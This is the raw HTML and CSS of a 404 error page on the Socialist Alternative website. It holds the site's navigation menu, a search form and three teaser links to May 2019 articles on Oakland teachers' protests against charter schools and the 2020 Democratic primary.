.td-header-desktop-sticky-wrap.td-header-active { opacity: 1; } .td-header-desktop-sticky-wrap { transform: translateY(-120%); -webkit-transform: translateY(-120%); -moz-transform: translateY(-120%); -ms-transform: translateY(-120%); -o-transform: translateY(-120%); } .td-header-desktop-sticky-wrap.td-header-active { transform: translateY(0); -webkit-transform: translateY(0); -moz-transform: translateY(0); -ms-transform: translateY(0); -o-transform: translateY(0); } .td-header-desktop-sticky-wrap { -webkit-transition: all 0.3s ease-in-out; -moz-transition: all 0.3s ease-in-out; -o-transition: all 0.3s ease-in-out; transition: all 0.3s ease-in-out; } /* inline tdc_css att */ .td_uid_29_5cdd903e45850_rand{ position:relative; } </style> <div class="td_uid_17_5cdd903e45846_rand_style td-element-style" ><style> .td_uid_17_5cdd903e45846_rand_style{ background-color:#ea2e2e !important; } </style></div><div id="td_uid_18_5cdd903e45a33" class="tdc-row stretch_row_1200 td-stretch-content"><div class="vc_row td_uid_30_5cdd903e45a39_rand wpb_row td-pb-row tdc-element-style tdc-row-content-vert-center" > <style scoped> /* custom css */ @media (min-width: 768px) { .td_uid_30_5cdd903e45a39_rand { margin-left: -0px; margin-right: -0px; } .td_uid_30_5cdd903e45a39_rand .vc_column { padding-left: 0px; padding-right: 0px; } } .td_uid_30_5cdd903e45a39_rand { min-height: 0; } .td_uid_30_5cdd903e45a39_rand.tdc-row-content-vert-center, .td_uid_30_5cdd903e45a39_rand.tdc-row-content-vert-center .tdc-columns { display: flex; align-items: center; flex: 1; } .td_uid_30_5cdd903e45a39_rand.tdc-row-content-vert-bottom, .td_uid_30_5cdd903e45a39_rand.tdc-row-content-vert-bottom .tdc-columns { display: flex; align-items: flex-end; flex: 1; } @media (max-width: 767px) { .td_uid_30_5cdd903e45a39_rand, .td_uid_30_5cdd903e45a39_rand .tdc-columns { flex-direction: column; } } .td_uid_30_5cdd903e45a39_rand.tdc-row-content-vert-center .td_block_wrap { vertical-align: middle; } .td_uid_30_5cdd903e45a39_rand.tdc-row-content-vert-bottom .td_block_wrap { vertical-align: bottom; } /* inline tdc_css att */ .td_uid_30_5cdd903e45a39_rand{ position:relative; } .td_uid_30_5cdd903e45a39_rand .td_block_wrap{ text-align:left } /* portrait */ @media (min-width: 768px) and (max-width: 1018px) { .td_uid_30_5cdd903e45a39_rand{ padding-right:14px !important; padding-left:14px !important; } } </style> <div class="td_uid_18_5cdd903e45a33_rand_style td-element-style" style="opacity: 0; transition: opacity 1s;"><style> .td_uid_18_5cdd903e45a33_rand_style{ background-color:#cc1e12 !important; } </style></div><div class="vc_column td_uid_31_5cdd903e45be5_rand wpb_column vc_column_container tdc-column td-pb-span3"> <style scoped> /* custom css */ .td_uid_31_5cdd903e45be5_rand { vertical-align: baseline; } /* inline tdc_css att */ .td_uid_31_5cdd903e45be5_rand{ width:15% !important; } /* portrait */ @media (min-width: 768px) and (max-width: 1018px) { .td_uid_31_5cdd903e45be5_rand{ width:21% !important; } } </style><div class="wpb_wrapper"><div class="td_block_wrap tdb_header_logo td_uid_32_5cdd903e45d06_rand td-pb-border-top td_block_template_14 tdb-header-align" data-td-block-uid="td_uid_32_5cdd903e45d06" > <style> /* inline tdc_css att */ .td_uid_32_5cdd903e45d06_rand{ padding-right:10px !important; } </style> <style> /* custom css */ .td_uid_32_5cdd903e45d06_rand .tdb-logo-a, .td_uid_32_5cdd903e45d06_rand h1 { flex-direction: row; } .td_uid_32_5cdd903e45d06_rand .tdb-logo-a, .td_uid_32_5cdd903e45d06_rand h1 { align-items: flex-end; } .td_uid_32_5cdd903e45d06_rand .tdb-logo-img { max-width: 160px; } .td_uid_32_5cdd903e45d06_rand .tdb-logo-img-wrap { margin-right: 5px; } .td_uid_32_5cdd903e45d06_rand .tdb-logo-img-wrap:last-child { margin-right: 0; } .td_uid_32_5cdd903e45d06_rand .tdb-logo-img-wrap { margin-bottom: 0px; } .td_uid_32_5cdd903e45d06_rand .tdb-logo-img-wrap:last-child { margin-bottom: 0; } .td_uid_32_5cdd903e45d06_rand .tdb-logo-img-wrap { display: block; } .td_uid_32_5cdd903e45d06_rand .tdb-logo-text-tagline { margin-top: -2px; } .td_uid_32_5cdd903e45d06_rand .tdb-logo-text-title { display: block; } .td_uid_32_5cdd903e45d06_rand .tdb-logo-text-tagline { display: block; } .td_uid_32_5cdd903e45d06_rand .tdb-logo-text-title, .td_uid_32_5cdd903e45d06_rand .tdb-logo-text-tagline { display: block; } .td_uid_32_5cdd903e45d06_rand .tdb-logo-text-tagline { text-align: center; } .td_uid_32_5cdd903e45d06_rand .tdb-logo-icon { top: 0px; } .td_uid_32_5cdd903e45d06_rand .tdb-logo-icon { display: block; } .td_uid_32_5cdd903e45d06_rand .tdb-logo-text-title { color: #ffffff; } .td_uid_32_5cdd903e45d06_rand .tdb-logo-text-tagline { color: #ffffff; } .td_uid_32_5cdd903e45d06_rand .tdb-logo-text-title { font-family:Oswald !important;font-size:20px !important;text-transform:uppercase !important;; } .td_uid_32_5cdd903e45d06_rand .tdb-logo-text-tagline { font-family:Open Sans !important;font-size:11px !important;; } </style><div class="tdb-block-inner td-fix-index"><a class="tdb-logo-a" href="https://www.socialistalternative.org/"><div class="tdb-logo-img-wrap"><img class="tdb-logo-img" src="https://www.socialistalternative.org/wp-content/uploads/2019/02/whitelogo-1.png" alt="" title="" /></div></a></div></div> <!-- ./block --></div></div><div class="vc_column td_uid_33_5cdd903e4a32f_rand wpb_column vc_column_container tdc-column td-pb-span9"> <style scoped> /* custom css */ .td_uid_33_5cdd903e4a32f_rand { vertical-align: baseline; } /* inline tdc_css att */ .td_uid_33_5cdd903e4a32f_rand{ padding-right:30px !important; padding-left:40px !important; width:95% !important; } /* portrait */ @media (min-width: 768px) and (max-width: 1018px) { .td_uid_33_5cdd903e4a32f_rand{ width:80% !important; } } </style><div class="wpb_wrapper"><div class="td_block_wrap tdb_header_menu td_uid_34_5cdd903e4a548_rand tds_menu_active1 tds_menu_sub_active1 tdb-head-menu-inline tdb-menu-items-in-more tdb-mm-align-screen td-pb-border-top td_block_template_14 tdb-header-align" data-td-block-uid="td_uid_34_5cdd903e4a548" style=" z-index: 999;"> <style> /* custom css */ .td_uid_34_5cdd903e4a548_rand { display: inline-block; } .td_uid_34_5cdd903e4a548_rand .td_block_inner { text-align: center; } .td_uid_34_5cdd903e4a548_rand .tdb-menu > li { margin-right: 28px; } .td_uid_34_5cdd903e4a548_rand .tdb-menu > li:last-child { margin-right: 0; } .td_uid_34_5cdd903e4a548_rand .tdb-menu-items-dropdown { margin-left: 28px; } .td_uid_34_5cdd903e4a548_rand .tdb-menu-items-empty + .tdb-menu-items-dropdown { margin-left: 0; } .td_uid_34_5cdd903e4a548_rand .tdb-menu > li > a, .td_uid_34_5cdd903e4a548_rand .td-subcat-more { padding: 0px; } .td_uid_34_5cdd903e4a548_rand .tdb-menu > li .tdb-menu-sep, .td_uid_34_5cdd903e4a548_rand .tdb-menu-items-dropdown .tdb-menu-sep { top: -1px; } .td_uid_34_5cdd903e4a548_rand .tdb-menu > li > a .tdb-sub-menu-icon, .td_uid_34_5cdd903e4a548_rand .td-subcat-more .tdb-menu-more-subicon { top: -1px; } .td_uid_34_5cdd903e4a548_rand .td-subcat-more .tdb-menu-more-icon { top: 0px; } .td_uid_34_5cdd903e4a548_rand .tdb-menu > li > a, .td_uid_34_5cdd903e4a548_rand .td-subcat-more > .tdb-menu-item-text { color: #ffffff; } .td_uid_34_5cdd903e4a548_rand .tdb-menu > li > a, .td_uid_34_5cdd903e4a548_rand .td-subcat-more > .tdb-menu-item-text { font-family:Roboto Condensed !important;font-size:16px !important;line-height:48px !important;font-weight:700 !important; } .td_uid_34_5cdd903e4a548_rand .tdb-normal-menu ul .tdb-menu-item > a .tdb-sub-menu-icon { right: 0; } .td_uid_34_5cdd903e4a548_rand .tdb-normal-menu ul .tdb-menu-item > a .tdb-sub-menu-icon { margin-top: 1px; } .td_uid_34_5cdd903e4a548_rand .tdb-menu .tdb-normal-menu ul, .td_uid_34_5cdd903e4a548_rand .td-pulldown-filter-list { box-shadow: 1px 1px 4px 0px rgba(0, 0, 0, 0.15); } .td_uid_34_5cdd903e4a548_rand:not(.tdb-mm-align-screen) .tdb-mega-menu ul, .td_uid_34_5cdd903e4a548_rand .tdb-mega-menu ul li { max-width: 1200px !important; } .td_uid_34_5cdd903e4a548_rand .tdb-mega-menu .tdb_header_mega_menu { max-width: 1114px; margin: 0 auto; } .td_uid_34_5cdd903e4a548_rand .tdb-menu .tdb-mega-menu ul li { box-shadow: 0px 2px 6px 0px rgba(0, 0, 0, 0.1); } /* portrait */ @media (min-width: 768px) and (max-width: 1018px){ .td_uid_34_5cdd903e4a548_rand .tdb-menu > li { margin-right: 18px; } .td_uid_34_5cdd903e4a548_rand .tdb-menu > li:last-child { margin-right: 0; } .td_uid_34_5cdd903e4a548_rand .tdb-menu-items-dropdown { margin-left: 18px; } .td_uid_34_5cdd903e4a548_rand .tdb-menu-items-empty + .tdb-menu-items-dropdown { margin-left: 0; } .td_uid_34_5cdd903e4a548_rand .tdb-menu > li > a, .td_uid_34_5cdd903e4a548_rand .td-subcat-more > .tdb-menu-item-text { font-family:Roboto Condensed !important;font-size:14px !important;line-height:48px !important;font-weight:700 !important; } } </style> <style> .td_uid_34_5cdd903e4a548_rand .tdb-menu > li > a:after, .td_uid_34_5cdd903e4a548_rand .tdb-menu-items-dropdown .td-subcat-more:after { background-color: rgba(255,255,255,0.7); } .td_uid_34_5cdd903e4a548_rand .tdb-menu > li > a:after, .td_uid_34_5cdd903e4a548_rand .tdb-menu-items-dropdown .td-subcat-more:after { bottom: 0px; } </style> <style> </style><div id=td_uid_34_5cdd903e4a548 class="td_block_inner td-fix-index"><div class="tdb-menu-items-pulldown"><ul id="tdb-block-menu" class="tdb-menu tdb-menu-items-visible"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-first tdb-menu-item-button tdb-menu-item tdb-normal-menu menu-item-21298"><a href="https://www.socialistalternative.org/join/"><span class="tdb-menu-item-text">Join SA</span><i class="tdb-sub-menu-icon td-icon-down"></i></a> <ul class="sub-menu"> <li class="menu-item menu-item-type-custom menu-item-object-custom tdb-menu-item tdb-normal-menu menu-item-40483"><a href="https://www.socialistalternative.org/about/"><span class="tdb-menu-item-text">About/What We Stand For</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom tdb-menu-item tdb-normal-menu menu-item-42085"><a href="http://www.socialistalternative.org/socialistmerch/"><span class="tdb-menu-item-text">Socialist Merch</span></a></li> </ul> </li> <li class="menu-item menu-item-type-post_type menu-item-object-page tdb-menu-item-button tdb-menu-item tdb-normal-menu menu-item-8416"><a href="https://www.socialistalternative.org/in-your-area/"><span class="tdb-menu-item-text">In Your Area</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children tdb-menu-item-button tdb-menu-item tdb-normal-menu menu-item-25613"><a href="http://www.socialistalternative.org/category/top-stories/"><span class="tdb-menu-item-text">News and Analysis</span><i class="tdb-sub-menu-icon td-icon-down"></i></a> <ul class="sub-menu"> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children tdb-menu-item tdb-normal-menu menu-item-25629"><a href="https://www.socialistalternative.org/category/us-politics/"><span class="tdb-menu-item-text">U.S. Politics</span><i class="tdb-sub-menu-icon td-icon-right-arrow"></i></a> <ul class="sub-menu"> <li class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-25620"><a href="https://www.socialistalternative.org/category/fighting-racism/"><span class="tdb-menu-item-text">Fighting Racism</span></a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-25621"><a href="https://www.socialistalternative.org/category/healthcare/"><span class="tdb-menu-item-text">Health Care</span></a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-25623"><a href="https://www.socialistalternative.org/category/immigrants-rights/"><span class="tdb-menu-item-text">Immigrants Rights</span></a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-25624"><a href="https://www.socialistalternative.org/category/lgbt-rights/"><span class="tdb-menu-item-text">LGBTQ Rights</span></a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-25633"><a href="https://www.socialistalternative.org/category/womens-rights/"><span class="tdb-menu-item-text">Women&#8217;s Rights</span></a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-25634"><a href="https://www.socialistalternative.org/category/workers-movement/"><span class="tdb-menu-item-text">Workers&#8217; Movement</span></a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-25615"><a href="https://www.socialistalternative.org/category/culture/"><span class="tdb-menu-item-text">Culture</span></a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-25616"><a href="https://www.socialistalternative.org/category/economy/"><span class="tdb-menu-item-text">Economy</span></a></li> </ul> </li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-25635"><a href="https://www.socialistalternative.org/category/world-events/"><span class="tdb-menu-item-text">World Events</span></a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-25636"><a href="https://www.socialistalternative.org/category/youth-students/"><span class="tdb-menu-item-text">Youth &amp; Students</span></a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-25618"><a href="https://www.socialistalternative.org/category/environment/"><span class="tdb-menu-item-text">Environment</span></a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children tdb-menu-item tdb-normal-menu menu-item-25626"><a href="https://www.socialistalternative.org/category/socialist-alternative-in-action/"><span class="tdb-menu-item-text">Socialist Alternative In Action</span><i class="tdb-sub-menu-icon td-icon-right-arrow"></i></a> <ul class="sub-menu"> <li class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-27839"><a href="https://www.socialistalternative.org/category/socialist-alternative-in-action/documents-leaflets-statements/"><span class="tdb-menu-item-text">Documents &amp; Leaflets &amp; Statements</span></a></li> </ul> </li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-25631"><a href="https://www.socialistalternative.org/category/videos/"><span class="tdb-menu-item-text">Videos</span></a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children tdb-menu-item tdb-normal-menu menu-item-25622"><a href="https://www.socialistalternative.org/category/history/"><span class="tdb-menu-item-text">History</span><i class="tdb-sub-menu-icon td-icon-right-arrow"></i></a> <ul class="sub-menu"> <li class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-27837"><a href="https://www.socialistalternative.org/category/history/centenary-of-russian-revolution/"><span class="tdb-menu-item-text">Centenary of the Russian Revolution</span></a></li> </ul> </li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-25627"><a href="https://www.socialistalternative.org/category/theory/"><span class="tdb-menu-item-text">Theory</span></a></li> </ul> </li> <li class="menu-item menu-item-type-custom menu-item-object-custom tdb-menu-item-button tdb-menu-item tdb-normal-menu menu-item-8465"><a href="http://www.socialistworld.net"><span class="tdb-menu-item-text">World News</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children tdb-menu-item-button tdb-menu-item tdb-normal-menu menu-item-13889"><a href="https://www.socialistalternative.org/publications/"><span class="tdb-menu-item-text">Publications</span><i class="tdb-sub-menu-icon td-icon-down"></i></a> <ul class="sub-menu"> <li class="menu-item menu-item-type-post_type menu-item-object-page tdb-menu-item tdb-normal-menu menu-item-24518"><a href="https://www.socialistalternative.org/publications/"><span class="tdb-menu-item-text">Books and Pamphlets</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom tdb-menu-item tdb-normal-menu menu-item-24519"><a href="https://www.socialistalternative.org/dual-subscription-deal/"><span class="tdb-menu-item-text">Newspaper</span></a></li> </ul> </li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item-button tdb-menu-item tdb-normal-menu menu-item-21308"><a href="https://www.socialistalternative.org/category/en-espanol/"><span class="tdb-menu-item-text">en español</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom tdb-menu-item-button tdb-menu-item tdb-normal-menu menu-item-25670"><a href="/donate"><span class="tdb-menu-item-text">Donate</span></a></li> </ul><div class="tdb-menu-items-dropdown"><div class="td-subcat-more"><span class="tdb-menu-item-text">More</span><i class="tdb-menu-more-subicon td-icon-down"></i><ul class="td-pulldown-filter-list"></ul></div></div></div></div></div><div class="td_block_wrap tdb_header_search td_uid_37_5cdd903e4df3f_rand td-pb-border-top td_block_template_14 tdb-header-align" data-td-block-uid="td_uid_37_5cdd903e4df3f" > <style> /* inline tdc_css att */ /* desktop */ @media(min-width: 1141px) { .td_uid_37_5cdd903e4df3f_rand { display:inline-block !important; } } </style> <style> /* custom css */ .td_uid_37_5cdd903e4df3f_rand .tdb-head-search-btn i { font-size: 20px; } .td_uid_37_5cdd903e4df3f_rand .tdb-head-search-btn i { width: 48px; height: 48px; line-height: 48px; } .td_uid_37_5cdd903e4df3f_rand { display: inline-block; } .td_uid_37_5cdd903e4df3f_rand { float: right; } .td_uid_37_5cdd903e4df3f_rand .tdb-search-txt { top: 0px; } .td_uid_37_5cdd903e4df3f_rand .tdb-drop-down-search { left: auto; right: 0; } .td_uid_37_5cdd903e4df3f_rand .tdb-head-search-form-input:focus + .tdb-head-search-placeholder { top: -50%; transform: translateY(0); } .td_uid_37_5cdd903e4df3f_rand .tdb-head-search-form-btn i { top: 0px; } .td_uid_37_5cdd903e4df3f_rand .result-msg { text-align: center; } .td_uid_37_5cdd903e4df3f_rand .tdb-head-search-btn i { color: #ffffff; } .td_uid_37_5cdd903e4df3f_rand .tdb-head-search-btn:hover i { color: #ffffff; } .td_uid_37_5cdd903e4df3f_rand .tdb-drop-down-search { box-shadow: 0px 2px 6px 0px rgba(0, 0, 0, 0.2); } .td_uid_37_5cdd903e4df3f_rand .tdb-head-search-form-input:focus + .tdb-head-search-placeholder { opacity: 0.5; } .td_uid_37_5cdd903e4df3f_rand .td_module_wrap { width: 100%; float: left; } .td_uid_37_5cdd903e4df3f_rand .td_module_wrap:nth-last-child(-n+1) { margin-bottom: 0; padding-bottom: 0; } .td_uid_37_5cdd903e4df3f_rand .td_module_wrap:nth-last-child(-n+1) .td-module-container:before { display: none; } .td_uid_37_5cdd903e4df3f_rand .td_module_wrap { padding-left: 11px; padding-right: 11px; } .td_uid_37_5cdd903e4df3f_rand .tdb-aj-search-inner { margin-left: -11px; margin-right: -11px; } .td_uid_37_5cdd903e4df3f_rand .td_module_wrap { padding-bottom: 10px; margin-bottom: 10px; } .td_uid_37_5cdd903e4df3f_rand .td-module-container:before { bottom: -10px; } .td_uid_37_5cdd903e4df3f_rand .td-module-container:before { border-color: #eaeaea; } .td_uid_37_5cdd903e4df3f_rand .entry-thumb { background-position: center 50%; } .td_uid_37_5cdd903e4df3f_rand .td-image-container { flex: 0 0 30%; width: 30%; } .ie10 .td_uid_37_5cdd903e4df3f_rand .td-image-container, .ie11 .td_uid_37_5cdd903e4df3f_rand .td-image-container { flex: 0 0 auto; } .td_uid_37_5cdd903e4df3f_rand .td-module-container { flex-direction: row; } .td_uid_37_5cdd903e4df3f_rand .td-image-container { display: block; order: 0; } .ie10 .td_uid_37_5cdd903e4df3f_rand .td-module-meta-info, .ie11 .td_uid_37_5cdd903e4df3f_rand .td-module-meta-info { flex: 1; } .td_uid_37_5cdd903e4df3f_rand .td-module-meta-info { padding: 2px 0 0 15px; } .td_uid_37_5cdd903e4df3f_rand .entry-title { margin: 0 0 5px; } .td_uid_37_5cdd903e4df3f_rand .td-excerpt { column-count: 1; } .td_uid_37_5cdd903e4df3f_rand .td-excerpt { column-gap: 48px; } .td_uid_37_5cdd903e4df3f_rand .td-module-meta-info { border-color: #eaeaea; } .td_uid_37_5cdd903e4df3f_rand .td-post-category { display: none; } .td_uid_37_5cdd903e4df3f_rand .td-excerpt { display: none; } .td_uid_37_5cdd903e4df3f_rand .td-read-more { display: none; } .td_uid_37_5cdd903e4df3f_rand .td-post-author-name { display: none; } .td_uid_37_5cdd903e4df3f_rand .entry-review-stars { display: none; } .td_uid_37_5cdd903e4df3f_rand .td-module-comments { display: none; } .td_uid_37_5cdd903e4df3f_rand .tdb-author-photo .avatar { width: 20px; height: 20px; } .td_uid_37_5cdd903e4df3f_rand .tdb-author-photo .avatar { margin-right: 6px; } .td_uid_37_5cdd903e4df3f_rand .tdb-author-photo .avatar { border-radius: 50%; } /* landscape */ @media (min-width: 1019px) and (max-width: 1140px){ .td_uid_37_5cdd903e4df3f_rand .td_module_wrap { padding-bottom: 10px !important; margin-bottom: 10px !important; } .td_uid_37_5cdd903e4df3f_rand .td_module_wrap:nth-last-child(-n+1) { margin-bottom: 0 !important; padding-bottom: 0 !important; } .td_uid_37_5cdd903e4df3f_rand .td_module_wrap .td-module-container:before { display: block !important; } .td_uid_37_5cdd903e4df3f_rand .td_module_wrap:nth-last-child(-n+1) .td-module-container:before { display: none !important; } .td_uid_37_5cdd903e4df3f_rand .td_module_wrap { padding-bottom: 10px; margin-bottom: 10px; } .td_uid_37_5cdd903e4df3f_rand .td-module-container:before { bottom: -10px; } } /* portrait */ @media (min-width: 768px) and (max-width: 1018px){ .td_uid_37_5cdd903e4df3f_rand .td_module_wrap { padding-bottom: 10px !important; margin-bottom: 10px !important; } .td_uid_37_5cdd903e4df3f_rand .td_module_wrap:nth-last-child(-n+1) { margin-bottom: 0 !important; padding-bottom: 0 !important; } .td_uid_37_5cdd903e4df3f_rand .td_module_wrap .td-module-container:before { display: block !important; } .td_uid_37_5cdd903e4df3f_rand .td_module_wrap:nth-last-child(-n+1) .td-module-container:before { display: none !important; } .td_uid_37_5cdd903e4df3f_rand .td_module_wrap { padding-bottom: 10px; margin-bottom: 10px; } .td_uid_37_5cdd903e4df3f_rand .td-module-container:before { bottom: -10px; } } /* phone */ @media (max-width: 767px){ .td_uid_37_5cdd903e4df3f_rand .td_module_wrap { padding-bottom: 10px !important; margin-bottom: 10px !important; } .td_uid_37_5cdd903e4df3f_rand .td_module_wrap:nth-last-child(-n+1) { margin-bottom: 0 !important; padding-bottom: 0 !important; } .td_uid_37_5cdd903e4df3f_rand .td_module_wrap .td-module-container:before { display: block !important; } .td_uid_37_5cdd903e4df3f_rand .td_module_wrap:nth-last-child(-n+1) .td-module-container:before { display: none !important; } .td_uid_37_5cdd903e4df3f_rand .td_module_wrap { padding-bottom: 10px; margin-bottom: 10px; } .td_uid_37_5cdd903e4df3f_rand .td-module-container:before { bottom: -10px; } } </style><div class="tdb-block-inner td-fix-index"><div class="tdb-drop-down-search" aria-labelledby="td-header-search-button"><form method="get" class="tdb-search-form" action="https://www.socialistalternative.org/" aria-labelledby="tdb-head-search-form-btn"><div class="tdb-search-form-inner"><input class="tdb-head-search-form-input" type="text" value="" name="s" autocomplete="off" /><button class="wpb_button wpb_btn-inverse btn tdb-head-search-form-btn" type="submit"><span>Search</span></button></div></form><div class="tdb-aj-search"></div></div><a href="#" role="button" class="tdb-head-search-btn dropdown-toggle" data-toggle="dropdown"><i class="tdb-search-icon td-icon-search"></i></a></div></div> <!-- ./block --></div></div></div></div> <script> jQuery(window).load(function () { jQuery('body').find('#td_uid_18_5cdd903e45a33 .td-element-style').each(function (index, element) { jQuery(element).css('opacity', 1); return; }); }); </script> <script> jQuery(window).ready(function () { // We need timeout because the content must be rendered and interpreted on client setTimeout(function () { var $content = jQuery('body').find('#tdc-live-iframe'), refWindow = undefined; if ($content.length) { $content = $content.contents(); refWindow = document.getElementById('tdc-live-iframe').contentWindow || document.getElementById('tdc-live-iframe').contentDocument; } else { $content = jQuery('body'); refWindow = window; } $content.find('#td_uid_18_5cdd903e45a33 .td-element-style').each(function (index, element) { jQuery(element).css('opacity', 1); return; }); }); }, 200); </script> </div></div> <script> jQuery(window).load(function () { jQuery('body').find('#td_uid_17_5cdd903e45846 .td-element-style').each(function (index, element) { jQuery(element).css('opacity', 1); return; }); }); </script> <script> jQuery(window).ready(function () { // We need timeout because the content must be rendered and interpreted on client setTimeout(function () { var $content = jQuery('body').find('#tdc-live-iframe'), refWindow = undefined; if ($content.length) { $content = $content.contents(); refWindow = document.getElementById('tdc-live-iframe').contentWindow || document.getElementById('tdc-live-iframe').contentDocument; } else { $content = jQuery('body'); refWindow = window; } $content.find('#td_uid_17_5cdd903e45846 .td-element-style').each(function (index, element) { jQuery(element).css('opacity', 1); return; }); }); }, 200); </script> </div> </div> <div class="td-main-content-wrap td-container-wrap"> <div class="td-container"> <div class="td-pb-row"> <div class="td-pb-span12"> <div class="td-404-title"> Ooops... Error 404 </div> <div class="td-404-sub-title"> Sorry, but the page you are looking for doesn't exist. </div> <div class="td-404-sub-sub-title"> You can go to the <a href="https://www.socialistalternative.org/">HOMEPAGE</a> </div> <h4 class="block-title"><span>OUR LATEST POSTS</span></h4> <div class="td-block-row"> <div class="td-block-span4"> <div class="td_module_1 td_module_wrap td-animation-stack"> <div class="td-module-image"> <div class="td-module-thumb"><a href="https://www.socialistalternative.org/2019/05/10/oakland-protests-charter-school-billionaires%ef%bb%bf/" rel="bookmark" class="td-image-wrap" title="Oakland Protests Charter-School Billionaires!"><img class="entry-thumb" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAUQAAACgAQMAAABOhoelAAAAA1BMVEWurq51dlI4AAAAAXRSTlMmkutdmwAAAB1JREFUWMPtwTEBAAAAwiD7p/ZdCGAAAAAAAAAQBxpAAAH8le3bAAAAAElFTkSuQmCC"alt="" title="Oakland Protests Charter-School Billionaires!" data-type="image_tag" data-img-url="https://www.socialistalternative.org/wp-content/uploads/2019/05/OEA-SA-Protest-May2019-324x160.jpg" width="324" height="160" /></a></div> <a href="https://www.socialistalternative.org/category/slider/" class="td-post-category">Slider</a> </div> <h3 class="entry-title td-module-title"><a href="https://www.socialistalternative.org/2019/05/10/oakland-protests-charter-school-billionaires%ef%bb%bf/" rel="bookmark" title="Oakland Protests Charter-School Billionaires!">Oakland Protests Charter-School Billionaires!</a></h3> <div class="td-module-meta-info"> <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2019-05-10T16:53:39+00:00" >May 10, 2019</time></span> </div> </div> </div> <!-- ./td-block-span4 --> <div class="td-block-span4"> <div class="td_module_1 td_module_wrap td-animation-stack"> <div class="td-module-image"> <div class="td-module-thumb"><a href="https://www.socialistalternative.org/2019/05/09/democratic-2020-race-begins-establishment-tries-to-stop-sanders/" rel="bookmark" class="td-image-wrap" title="Democratic 2020 Race Begins &#8211; Establishment Tries to Stop Sanders"><img class="entry-thumb" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAUQAAACgAQMAAABOhoelAAAAA1BMVEWurq51dlI4AAAAAXRSTlMmkutdmwAAAB1JREFUWMPtwTEBAAAAwiD7p/ZdCGAAAAAAAAAQBxpAAAH8le3bAAAAAElFTkSuQmCC"alt="" title="Democratic 2020 Race Begins &#8211; Establishment Tries to Stop Sanders" data-type="image_tag" data-img-url="https://www.socialistalternative.org/wp-content/uploads/2019/05/Bernie-MedicareForAll-324x160.jpg" width="324" height="160" /></a></div> <a href="https://www.socialistalternative.org/category/us-politics/2020-elections/" class="td-post-category">2020 Elections</a> </div> <h3 class="entry-title td-module-title"><a href="https://www.socialistalternative.org/2019/05/09/democratic-2020-race-begins-establishment-tries-to-stop-sanders/" rel="bookmark" title="Democratic 2020 Race Begins &#8211; Establishment Tries to Stop Sanders">Democratic 2020 Race Begins &#8211; Establishment Tries to Stop Sanders</a></h3> <div class="td-module-meta-info"> <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2019-05-09T11:58:18+00:00" >May 9, 2019</time></span> </div> </div> </div> <!-- ./td-block-span4 --> <div class="td-block-span4"> <div class="td_module_1 td_module_wrap td-animation-stack"> <div class="td-module-image"> <div class="td-module-thumb"><a href="https://www.socialistalternative.org/2019/05/06/oakland-organizes-against-billionaire-charter-school-profiteers-oakland-teachers-union-steps-up-its-fight-against-the-charter-school-invasion/" rel="bookmark" class="td-image-wrap" title="Oakland Teachers Step Up Fight Against Billionaire Charter School Profiteers"><img class="entry-thumb" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAUQAAACgAQMAAABOhoelAAAAA1BMVEWurq51dlI4AAAAAXRSTlMmkutdmwAAAB1JREFUWMPtwTEBAAAAwiD7p/ZdCGAAAAAAAAAQBxpAAAH8le3bAAAAAElFTkSuQmCC"alt="" title="Oakland Teachers Step Up Fight Against Billionaire Charter School Profiteers" data-type="image_tag" data-img-url="https://www.socialistalternative.org/wp-content/uploads/2019/05/52987297_1949994551764669_5117895266275426304_n-e1557186037995-324x160.jpg" width="324" height="160" /></a></div> <a href="https://www.socialistalternative.org/category/slider/" class="td-post-category">Slider</a> </div> <h3 class="entry-title td-module-title"><a href="https://www.socialistalternative.org/2019/05/06/oakland-organizes-against-billionaire-charter-school-profiteers-oakland-teachers-union-steps-up-its-fight-against-the-charter-school-invasion/" rel="bookmark" title="Oakland Teachers Step Up Fight Against Billionaire Charter School Profiteers">Oakland Teachers Step Up Fight Against Billionaire Charter School Profiteers</a></h3> <div class="td-module-meta-info"> <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2019-05-06T19:45:38+00:00" >May 6, 2019</time></span> </div> </div> </div> <!-- ./td-block-span4 